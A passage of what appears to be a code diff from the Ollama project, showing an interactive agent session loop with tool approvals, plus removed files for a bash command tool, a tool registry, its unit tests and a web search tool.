if i > 0 {
out += "\n"
}
out += fmt.Sprintf(" Tool call: %s(%s)", formatValues+toolCall.Function.Name+formatExplanation, formatValues+string(argsAsJSON)+formatExplanation)
}
if !plainText {
out += readline.ColorDefault
}
return out
}
// checkModelCapabilities checks if the model supports tools.
func checkModelCapabilities(ctx context.Context, modelName string) (supportsTools bool, err error) {
client, err := api.ClientFromEnvironment()
if err != nil {
return false, err
}
resp, err := client.Show(ctx, &api.ShowRequest{Model: modelName})
if err != nil {
return false, err
}
for _, cap := range resp.Capabilities {
if cap == model.CapabilityTools {
return true, nil
}
}
return false, nil
}
// GenerateInteractive runs an interactive agent session.
// This is called from cmd.go when --experimental flag is set.
func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, options map[string]any, think *api.ThinkValue, hideThinking bool, keepAlive *api.Duration) error {
scanner, err := readline.New(readline.Prompt{
Prompt: ">>> ",
AltPrompt: "... ",
Placeholder: "Send a message (/? for help)",
AltPlaceholder: `Use """ to end multi-line input`,
})
if err != nil {
return err
}
fmt.Print(readline.StartBracketedPaste)
defer fmt.Printf(readline.EndBracketedPaste)
// Check if model supports tools
supportsTools, err := checkModelCapabilities(cmd.Context(), modelName)
if err != nil {
fmt.Fprintf(os.Stderr, "\033[33mWarning: Could not check model capabilities: %v\033[0m\n", err)
supportsTools = false
}
// Create tool registry only if model supports tools
var toolRegistry *tools.Registry
if supportsTools {
toolRegistry = tools.DefaultRegistry()
fmt.Fprintf(os.Stderr, "Tools available: %s\n", strings.Join(toolRegistry.Names(), ", "))
// Check for OLLAMA_API_KEY for web search
if os.Getenv("OLLAMA_API_KEY") == "" {
fmt.Fprintf(os.Stderr, "\033[33mWarning: OLLAMA_API_KEY not set - web search will not work\033[0m\n")
}
} else {
fmt.Fprintf(os.Stderr, "\033[33mNote: Model does not support tools - running in chat-only mode\033[0m\n")
}
// Create approval manager for session
approval := agent.NewApprovalManager()
var messages []api.Message
var sb strings.Builder
for {
line, err := scanner.Readline()
switch {
case errors.Is(err, io.EOF):
fmt.Println()
return nil
case errors.Is(err, readline.ErrInterrupt):
if line == "" {
fmt.Println("\nUse Ctrl + d or /bye to exit.")
}
sb.Reset()
continue
case err != nil:
return err
}
switch {
case strings.HasPrefix(line, "/exit"), strings.HasPrefix(line, "/bye"):
return nil
case strings.HasPrefix(line, "/clear"):
messages = []api.Message{}
approval.Reset()
fmt.Println("Cleared session context and tool approvals")
continue
case strings.HasPrefix(line, "/tools"):
showToolsStatus(toolRegistry, approval, supportsTools)
continue
case strings.HasPrefix(line, "/help"), strings.HasPrefix(line, "/?"):
fmt.Fprintln(os.Stderr, "Available Commands:")
fmt.Fprintln(os.Stderr, " /tools Show available tools and approvals")
fmt.Fprintln(os.Stderr, " /clear Clear session context and approvals")
fmt.Fprintln(os.Stderr, " /bye Exit")
fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
fmt.Fprintln(os.Stderr, "")
continue
case strings.HasPrefix(line, "/"):
fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
continue
default:
sb.WriteString(line)
}
if sb.Len() > 0 {
newMessage := api.Message{Role: "user", Content: sb.String()}
messages = append(messages, newMessage)
opts := RunOptions{
Model: modelName,
Messages: messages,
WordWrap: wordWrap,
Options: options,
Think: think,
HideThinking: hideThinking,
KeepAlive: keepAlive,
Tools: toolRegistry,
Approval: approval,
}
assistant, err := Chat(cmd.Context(), opts)
if err != nil {
return err
}
if assistant != nil {
messages = append(messages, *assistant)
}
sb.Reset()
}
}
}
// showToolsStatus displays the current tools and approval status.
func showToolsStatus(registry *tools.Registry, approval *agent.ApprovalManager, supportsTools bool) {
if !supportsTools || registry == nil {
fmt.Println("Tools not available - model does not support tool calling")
fmt.Println()
return
}
fmt.Println("Available tools:")
for _, name := range registry.Names() {
tool, _ := registry.Get(name)
fmt.Printf(" %s - %s\n", name, tool.Description())
}
allowed := approval.AllowedTools()
if len(allowed) > 0 {
fmt.Println("\nSession approvals:")
for _, key := range allowed {
fmt.Printf(" %s\n", key)
}
} else {
fmt.Println("\nNo tools approved for this session yet")
}
fmt.Println()
}

View File

@ -1,114 +0,0 @@
package tools
import (
"bytes"
"context"
"fmt"
"os/exec"
"strings"
"time"
"github.com/ollama/ollama/api"
)
const (
// bashTimeout is the maximum execution time for a command.
bashTimeout = 60 * time.Second
// maxOutputSize is the maximum output size in bytes.
maxOutputSize = 50000
)
// BashTool implements shell command execution.
type BashTool struct{}
// Name returns the tool name.
func (b *BashTool) Name() string {
return "bash"
}
// Description returns a description of the tool.
func (b *BashTool) Description() string {
return "Execute a bash command on the system. Use this to run shell commands, check files, run programs, etc."
}
// Schema returns the tool's parameter schema.
func (b *BashTool) Schema() api.ToolFunction {
props := api.NewToolPropertiesMap()
props.Set("command", api.ToolProperty{
Type: api.PropertyType{"string"},
Description: "The bash command to execute",
})
return api.ToolFunction{
Name: b.Name(),
Description: b.Description(),
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: props,
Required: []string{"command"},
},
}
}
// Execute runs the bash command.
func (b *BashTool) Execute(args map[string]any) (string, error) {
command, ok := args["command"].(string)
if !ok || command == "" {
return "", fmt.Errorf("command parameter is required")
}
// Create context with timeout
ctx, cancel := context.WithTimeout(context.Background(), bashTimeout)
defer cancel()
// Execute command
cmd := exec.CommandContext(ctx, "bash", "-c", command)
var stdout, stderr bytes.Buffer
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
// Build output
var sb strings.Builder
// Add stdout
if stdout.Len() > 0 {
output := stdout.String()
if len(output) > maxOutputSize {
output = output[:maxOutputSize] + "\n... (output truncated)"
}
sb.WriteString(output)
}
// Add stderr if present
if stderr.Len() > 0 {
stderrOutput := stderr.String()
if len(stderrOutput) > maxOutputSize {
stderrOutput = stderrOutput[:maxOutputSize] + "\n... (stderr truncated)"
}
if sb.Len() > 0 {
sb.WriteString("\n")
}
sb.WriteString("stderr:\n")
sb.WriteString(stderrOutput)
}
// Handle errors
if err != nil {
if ctx.Err() == context.DeadlineExceeded {
return sb.String() + "\n\nError: command timed out after 60 seconds", nil
}
// Include exit code in output but don't return as error
if exitErr, ok := err.(*exec.ExitError); ok {
return sb.String() + fmt.Sprintf("\n\nExit code: %d", exitErr.ExitCode()), nil
}
return sb.String(), fmt.Errorf("executing command: %w", err)
}
if sb.Len() == 0 {
return "(no output)", nil
}
return sb.String(), nil
}

View File

@ -1,96 +0,0 @@
// Package tools provides built-in tool implementations for the agent loop.
package tools
import (
"fmt"
"sort"
"github.com/ollama/ollama/api"
)
// Tool defines the interface for agent tools.
type Tool interface {
// Name returns the tool's unique identifier.
Name() string
// Description returns a human-readable description of what the tool does.
Description() string
// Schema returns the tool's parameter schema for the LLM.
Schema() api.ToolFunction
// Execute runs the tool with the given arguments.
Execute(args map[string]any) (string, error)
}
// Registry manages available tools.
type Registry struct {
tools map[string]Tool
}
// NewRegistry creates a new tool registry.
func NewRegistry() *Registry {
return &Registry{
tools: make(map[string]Tool),
}
}
// Register adds a tool to the registry.
func (r *Registry) Register(tool Tool) {
r.tools[tool.Name()] = tool
}
// Get retrieves a tool by name.
func (r *Registry) Get(name string) (Tool, bool) {
tool, ok := r.tools[name]
return tool, ok
}
// Tools returns all registered tools in Ollama API format, sorted by name.
func (r *Registry) Tools() api.Tools {
// Get sorted names for deterministic ordering
names := make([]string, 0, len(r.tools))
for name := range r.tools {
names = append(names, name)
}
sort.Strings(names)
var tools api.Tools
for _, name := range names {
tool := r.tools[name]
tools = append(tools, api.Tool{
Type: "function",
Function: tool.Schema(),
})
}
return tools
}
// Execute runs a tool call and returns the result.
func (r *Registry) Execute(call api.ToolCall) (string, error) {
tool, ok := r.tools[call.Function.Name]
if !ok {
return "", fmt.Errorf("unknown tool: %s", call.Function.Name)
}
return tool.Execute(call.Function.Arguments.ToMap())
}
// Names returns the names of all registered tools, sorted alphabetically.
func (r *Registry) Names() []string {
names := make([]string, 0, len(r.tools))
for name := range r.tools {
names = append(names, name)
}
sort.Strings(names)
return names
}
// Count returns the number of registered tools.
func (r *Registry) Count() int {
return len(r.tools)
}
// DefaultRegistry creates a registry with all built-in tools.
func DefaultRegistry() *Registry {
r := NewRegistry()
r.Register(&WebSearchTool{})
r.Register(&BashTool{})
return r
}

View File

@ -1,143 +0,0 @@
package tools
import (
"testing"
"github.com/ollama/ollama/api"
)
func TestRegistry_Register(t *testing.T) {
r := NewRegistry()
r.Register(&BashTool{})
r.Register(&WebSearchTool{})
if r.Count() != 2 {
t.Errorf("expected 2 tools, got %d", r.Count())
}
names := r.Names()
if len(names) != 2 {
t.Errorf("expected 2 names, got %d", len(names))
}
}
func TestRegistry_Get(t *testing.T) {
r := NewRegistry()
r.Register(&BashTool{})
tool, ok := r.Get("bash")
if !ok {
t.Fatal("expected to find bash tool")
}
if tool.Name() != "bash" {
t.Errorf("expected name 'bash', got '%s'", tool.Name())
}
_, ok = r.Get("nonexistent")
if ok {
t.Error("expected not to find nonexistent tool")
}
}
func TestRegistry_Tools(t *testing.T) {
r := NewRegistry()
r.Register(&BashTool{})
r.Register(&WebSearchTool{})
tools := r.Tools()
if len(tools) != 2 {
t.Errorf("expected 2 tools, got %d", len(tools))
}
for _, tool := range tools {
if tool.Type != "function" {
t.Errorf("expected type 'function', got '%s'", tool.Type)
}
}
}
func TestRegistry_Execute(t *testing.T) {
r := NewRegistry()
r.Register(&BashTool{})
// Test successful execution
args := api.NewToolCallFunctionArguments()
args.Set("command", "echo hello")
result, err := r.Execute(api.ToolCall{
Function: api.ToolCallFunction{
Name: "bash",
Arguments: args,
},
})
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result != "hello\n" {
t.Errorf("expected 'hello\\n', got '%s'", result)
}
// Test unknown tool
_, err = r.Execute(api.ToolCall{
Function: api.ToolCallFunction{
Name: "unknown",
Arguments: api.NewToolCallFunctionArguments(),
},
})
if err == nil {
t.Error("expected error for unknown tool")
}
}
func TestDefaultRegistry(t *testing.T) {
r := DefaultRegistry()
if r.Count() != 2 {
t.Errorf("expected 2 tools in default registry, got %d", r.Count())
}
_, ok := r.Get("bash")
if !ok {
t.Error("expected bash tool in default registry")
}
_, ok = r.Get("web_search")
if !ok {
t.Error("expected web_search tool in default registry")
}
}
func TestBashTool_Schema(t *testing.T) {
tool := &BashTool{}
schema := tool.Schema()
if schema.Name != "bash" {
t.Errorf("expected name 'bash', got '%s'", schema.Name)
}
if schema.Parameters.Type != "object" {
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
}
if _, ok := schema.Parameters.Properties.Get("command"); !ok {
t.Error("expected 'command' property in schema")
}
}
func TestWebSearchTool_Schema(t *testing.T) {
tool := &WebSearchTool{}
schema := tool.Schema()
if schema.Name != "web_search" {
t.Errorf("expected name 'web_search', got '%s'", schema.Name)
}
if schema.Parameters.Type != "object" {
t.Errorf("expected parameters type 'object', got '%s'", schema.Parameters.Type)
}
if _, ok := schema.Parameters.Properties.Get("query"); !ok {
t.Error("expected 'query' property in schema")
}
}

View File

@ -1,148 +0,0 @@
package tools
import (
"bytes"
"encoding/json"
"fmt"
"io"
"net/http"
"os"
"strings"
"time"
"github.com/ollama/ollama/api"
)
const (
webSearchAPI = "https://ollama.com/api/web_search"
webSearchTimeout = 15 * time.Second
)
// WebSearchTool implements web search using Ollama's hosted API.
type WebSearchTool struct{}
// Name returns the tool name.
func (w *WebSearchTool) Name() string {
return "web_search"
}
// Description returns a description of the tool.
func (w *WebSearchTool) Description() string {
return "Search the web for current information. Use this when you need up-to-date information that may not be in your training data."
}
// Schema returns the tool's parameter schema.
func (w *WebSearchTool) Schema() api.ToolFunction {
props := api.NewToolPropertiesMap()
props.Set("query", api.ToolProperty{
Type: api.PropertyType{"string"},
Description: "The search query to look up on the web",
})
return api.ToolFunction{
Name: w.Name(),
Description: w.Description(),
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: props,
Required: []string{"query"},
},
}
}
// webSearchRequest is the request body for the web search API.
type webSearchRequest struct {
Query string `json:"query"`
MaxResults int `json:"max_results,omitempty"`
}
// webSearchResponse is the response from the web search API.
type webSearchResponse struct {
Results []webSearchResult `json:"results"`
}
// webSearchResult is a single search result.
type webSearchResult struct {
Title string `json:"title"`
URL string `json:"url"`
Content string `json:"content"`
}
// Execute performs the web search.
func (w *WebSearchTool) Execute(args map[string]any) (string, error) {
query, ok := args["query"].(string)
if !ok || query == "" {
return "", fmt.Errorf("query parameter is required")
}
apiKey := os.Getenv("OLLAMA_API_KEY")
if apiKey == "" {
return "", fmt.Errorf("OLLAMA_API_KEY environment variable is required for web search")
}
// Prepare request
reqBody := webSearchRequest{
Query: query,
MaxResults: 5,
}
jsonBody, err := json.Marshal(reqBody)
if err != nil {
return "", fmt.Errorf("marshaling request: %w", err)
}
req, err := http.NewRequest("POST", webSearchAPI, bytes.NewBuffer(jsonBody))
if err != nil {
return "", fmt.Errorf("creating request: %w", err)
}
req.Header.Set("Content-Type", "application/json")
req.Header.Set("Authorization", "Bearer "+apiKey)
// Send request
client := &http.Client{Timeout: webSearchTimeout}
resp, err := client.Do(req)
if err != nil {
return "", fmt.Errorf("sending request: %w", err)
}
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
return "", fmt.Errorf("reading response: %w", err)
}
if resp.StatusCode != http.StatusOK {
return "", fmt.Errorf("web search API returned status %d: %s", resp.StatusCode, string(body))
}
// Parse response
var searchResp webSearchResponse
if err := json.Unmarshal(body, &searchResp); err != nil {
return "", fmt.Errorf("parsing response: %w", err)
}
// Format results
if len(searchResp.Results) == 0 {
return "No results found for query: " + query, nil
}
var sb strings.Builder
sb.WriteString(fmt.Sprintf("Search results for: %s\n\n", query))
for i, result := range searchResp.Results {
sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, result.Title))
sb.WriteString(fmt.Sprintf(" URL: %s\n", result.URL))
if result.Content != "" {
// Truncate long content (UTF-8 safe)
content := result.Content
runes := []rune(content)
if len(runes) > 300 {
content = string(runes[:300]) + "..."
}
sb.WriteString(fmt.Sprintf(" %s\n", content))
}
sb.WriteString("\n")
}
return sb.String(), nil
}